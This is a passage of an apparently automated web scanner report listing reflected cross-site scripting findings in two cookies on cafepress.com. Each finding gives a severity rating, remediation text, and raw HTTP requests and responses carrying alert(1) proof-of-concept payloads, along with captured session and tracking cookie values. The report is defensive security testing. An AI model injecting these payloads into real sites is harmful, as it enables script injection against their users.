GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=467e9</script><script>alert(1)</script>f97ce1fac6a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 54759
Date: Sun, 26 Dec 2010 13:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '467e9</script><script>alert(1)</script>f97ce1fac6a '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-hats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string encapsulated in double quotation marks: the Omniture variable assignment s.eVar30 = "...:<cp-v value> " in the inline script shown in the response below. The payload b1aa5"-alert(1)-"c0e3e257a86 was submitted appended to the baseline cp-v value and was echoed unmodified, so the double quote ends the string literal and -alert(1)- is evaluated as JavaScript. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a means of setting an arbitrary cp-v cookie in the victim's browser. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54696 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54696 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c5</script><script>alert(1)</script>e0b31c17436 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a30c5</script><script>alert(1)</script>e0b31c17436 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 54711 Date: Sun, 26 Dec 2010 13:48:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54711 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'a30c5</script><script>alert(1)</script>e0b31c17436 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hoodies-sweatshirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5222"-alert(1)-"66934ad12b9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 69614 Date: Sun, 26 Dec 2010 13:47:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hoodies-sweatshirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b326</script><script>alert(1)</script>7b9d98d964e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=9b326</script><script>alert(1)</script>7b9d98d964e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 69636 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '9b326</script><script>alert(1)</script>7b9d98d964e ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-ipad-case
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db02"-alert(1)-"9bd63bb7d30 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
